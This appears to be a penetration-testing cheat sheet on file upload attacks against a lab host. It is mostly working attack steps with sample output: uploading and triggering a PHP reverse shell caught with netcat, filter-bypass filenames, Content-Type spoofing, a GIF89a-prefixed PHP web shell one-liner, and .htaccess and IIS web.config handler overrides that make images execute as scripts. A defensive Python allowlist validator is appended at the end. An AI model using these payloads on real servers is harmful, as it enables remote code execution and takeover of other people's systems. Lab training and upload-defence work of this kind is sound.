FILE UPLOAD ATTACKS
Upload PHP reverse shell
Basic upload attempt — Check if .php is allowed
Upload pentestmonkey php-reverse-shell.php
Example Output
Upload pentestmonkey shell as shell.php
Response: 'File uploaded successfully'
Browse to: http://10.10.10.5/uploads/shell.php
nc -nlvp 443:
connect to [ATTACKER] from [10.10.10.5]
$ whoami
www-data
Bypass extension filter
Try alternative extensions — Different PHP handlers
shell.php5
shell.phtml
shell.phar
shell.phps
shell.php.jpg
shell.PHP
shell.php%00.jpg
Example Output
shell.php -> 'File type not allowed'
shell.php5 -> 'File type not allowed'
shell.phtml -> 'File uploaded successfully!'
(phtml bypassed the filter)
Bypass content-type check
Intercept and modify — Server checks MIME type only
Change Content-Type header to image/jpeg in Burp
Example Output
In Burp, change:
Content-Type: application/x-php
To:
Content-Type: image/jpeg
Server response: 'File uploaded successfully'
(Server only checked the client-supplied Content-Type header, not the actual file content)
Double extension
Confuse extension parsing — Some servers check only the last or only the first extension
shell.php.png
shell.jpg.php
Example Output
shell.php.png -> 'Uploaded successfully'
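But Apache still runs it as PHP when a handler is mapped to .php with AddHandler, because every extension in the name is considered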
Browse: http://10.10.10.5/uploads/shell.php.png
$ whoami
www-data
Magic bytes bypass
Bypass magic byte checks — File starts as valid image
Add GIF89a; to start of PHP file
Or embed PHP in image EXIF
Example Output
Add GIF89a; at top of PHP shell:
GIF89a;
<?php system($_GET['cmd']); ?>
Upload as shell.gif.php or shell.php
Server sees GIF magic bytes, allows upload
Upload .htaccess
Change how server handles files — Make .jpg execute as PHP
Upload .htaccess:
AddType application/x-httpd-php .jpg
Then upload shell.jpg
Example Output
Upload .htaccess containing:
AddType application/x-httpd-php .jpg
Then upload shell.jpg (with PHP code inside)
Browse: http://10.10.10.5/uploads/shell.jpg
$ whoami
www-data
(.jpg now executes as PHP)
Upload web.config (IIS)
IIS equivalent of .htaccess — ASP/ASPX execution
Upload web.config with handler for .jpg as ASP
Example Output
Upload web.config:
<handlers>
<add name='aspnet' path='*.jpg' verb='*' type='System.Web.UI.PageHandlerFactory'/>
</handlers>
Upload shell.jpg with ASP code
Browse to execute
(IIS treats .jpg as ASP)
Find upload location
Where did the file go? — Need path to trigger execution
Check response, view source, or gobuster
Example Output
Response: 'File uploaded to /uploads/shell.php'
OR: View source -> <img src='/uploads/shell.php'>
OR: gobuster dir -u http://10.10.10.5 -w wordlist.txt
/uploads/ (Status: 301)
(Need the path to trigger your shell)
Trigger uploaded shell
Execute your uploaded file — Start netcat listener first
curl http://$IP/uploads/shell.php
or browse to it
Example Output
nc -nlvp 443
curl http://10.10.10.5/uploads/shell.php
Listening on 0.0.0.0 443
Connection received from 10.10.10.5
$ whoami
www-data
(Reverse shell caught!)
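
Added example (not part of the original cheat sheet): a server-side upload check in Python that rejects every filename listed on this page by allowlisting a single extension, matching the Content-Type header and magic bytes to it, and storing the file under a server-generated name. The allowlist, function names and sample bytes are assumptions made for this example; blocklist_filter mimics the weak filter seen in the extension-bypass output above.

```python
import os
import re
import secrets

# Names taken from the page's bypass lists.
PAGE_NAMES = ["shell.php", "shell.php5", "shell.phtml", "shell.phar", "shell.PHP",
              "shell.php.jpg", "shell.php%00.jpg", "shell.php.png", "shell.jpg.php",
              "shell.gif.php", ".htaccess", "web.config"]

# Allowlist (constructed for this example): extension -> (magic prefixes, MIME type).
ALLOWED = {
    "jpg": ((b"\xff\xd8\xff",), "image/jpeg"),
    "png": ((b"\x89PNG\r\n\x1a\n",), "image/png"),
    "gif": ((b"GIF87a", b"GIF89a"), "image/gif"),
}
# One base name, exactly one dot, no leading dot, no path or encoded characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")


def blocklist_filter(filename):
    """Weak filter matching the page's example output: blocks only .php and .php5."""
    return filename.rsplit(".", 1)[-1] not in {"php", "php5"}


def validate_upload(filename, content_type, data):
    """Return (ok, reason, stored_name); stored_name is server-generated."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not SAFE_NAME.fullmatch(name):
        return False, "unsafe name (dotfile, extra dot, NUL or encoded byte)", None
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not on allowlist", None
    magics, mime = ALLOWED[ext]
    if content_type != mime:
        return False, "Content-Type does not match extension", None
    if not data.startswith(magics):
        return False, "magic bytes do not match extension", None
    # A polyglot (image header followed by script) still passes here, so the
    # stored name is random with a non-script extension, and the upload
    # directory must not execute scripts or honour uploaded .htaccess/web.config.
    return True, "ok", secrets.token_hex(16) + "." + ext


def compare(names=PAGE_NAMES):
    """Map each name to (passes weak blocklist, passes allowlist validator)."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed JPEG-like header
    return {n: (blocklist_filter(n), validate_upload(n, "image/jpeg", jpeg)[0])
            for n in names}
```

compare() shows that shell.phtml, shell.PHP and shell.php.jpg pass the blocklist while no name from the page passes the allowlist check. A file that begins with GIF89a; and is named with a .gif extension is still accepted, which is why the stored extension and a non-executing upload directory carry the defence rather than the magic-byte test.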